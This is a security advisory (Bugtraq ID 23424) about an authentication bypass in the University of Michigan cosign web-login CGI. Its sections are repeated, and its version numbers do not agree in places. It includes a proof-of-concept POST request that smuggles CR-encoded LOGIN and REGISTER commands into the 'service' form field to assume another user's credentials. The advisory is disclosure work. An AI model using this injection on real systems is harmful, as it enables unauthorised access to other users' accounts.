Cosign CGI Register Command Remote Authentication Bypass Vulnerability
BID:23424
Info
Cosign CGI Register Command Remote Authentication Bypass Vulnerability
| Bugtraq ID: | 23424 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 11 2007 12:00AM |
| Updated: | Apr 12 2007 03:51AM |
| Credit: | Jon Oberheide is credited with the discovery of this issue. |
| Vulnerable: |
University of Michigan cosign 2.0.1 University of Michigan cosign 2.9.4a |
| Not Vulnerable: |
University of Michigan cosign 2.9.4b University of Michigan cosign 2.0.2a |
Discussion
Cosign CGI Register Command Remote Authentication Bypass Vulnerability
The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input.
An authenticated attacker can exploit this issue to access services hosted on an affected computer by assuming another user's credentials.
Versions prior to 1.9.4b and 2.0.2a are vulnerable.
The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input.
An authenticated attacker can exploit this issue to access services hosted on an affected computer by assuming another user's credentials.
Versions prior to 1.9.4b and 2.0.2a are vulnerable.
Exploit / POC
Cosign CGI Register Command Remote Authentication Bypass Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept POST request is available:
POST /cosign-bin/cosign.cgi HTTP/1.0
Host: weblogin.example.com
Cookie: cosign=X
Content-Type: application/x-www-form-urlencoded
Content-Length: N
required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In
Attackers can use a browser to exploit this issue.
The following proof-of-concept POST request is available:
POST /cosign-bin/cosign.cgi HTTP/1.0
Host: weblogin.example.com
Cookie: cosign=X
Content-Type: application/x-www-form-urlencoded
Content-Length: N
required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In
Solution / Fix
Cosign CGI Register Command Remote Authentication Bypass Vulnerability
Solution:
The vendor has released fixes to address this issue. Please see the references for more information.
University of Michigan cosign 2.9.4a
University of Michigan cosign 2.0.1
Solution:
The vendor has released fixes to address this issue. Please see the references for more information.
University of Michigan cosign 2.9.4a
-
University of Michigan cosign-1.9.4b.tar.gz
http://www.umich.edu/~umweb/downloads/cosign-1.9.4b.tar.gz
University of Michigan cosign 2.0.1
-
University of Michigan cosign-2.0.2a.tar.gz
http://www.umich.edu/~umweb/downloads/cosign-2.0.2a.tar.gz
References
Cosign CGI Register Command Remote Authentication Bypass Vulnerability
References:
References:
- Cosign Homepage (University of Michigan)
- COSIGN-VULN-2007-002 Authentication bypass, remotely exploitable (University of Michigan)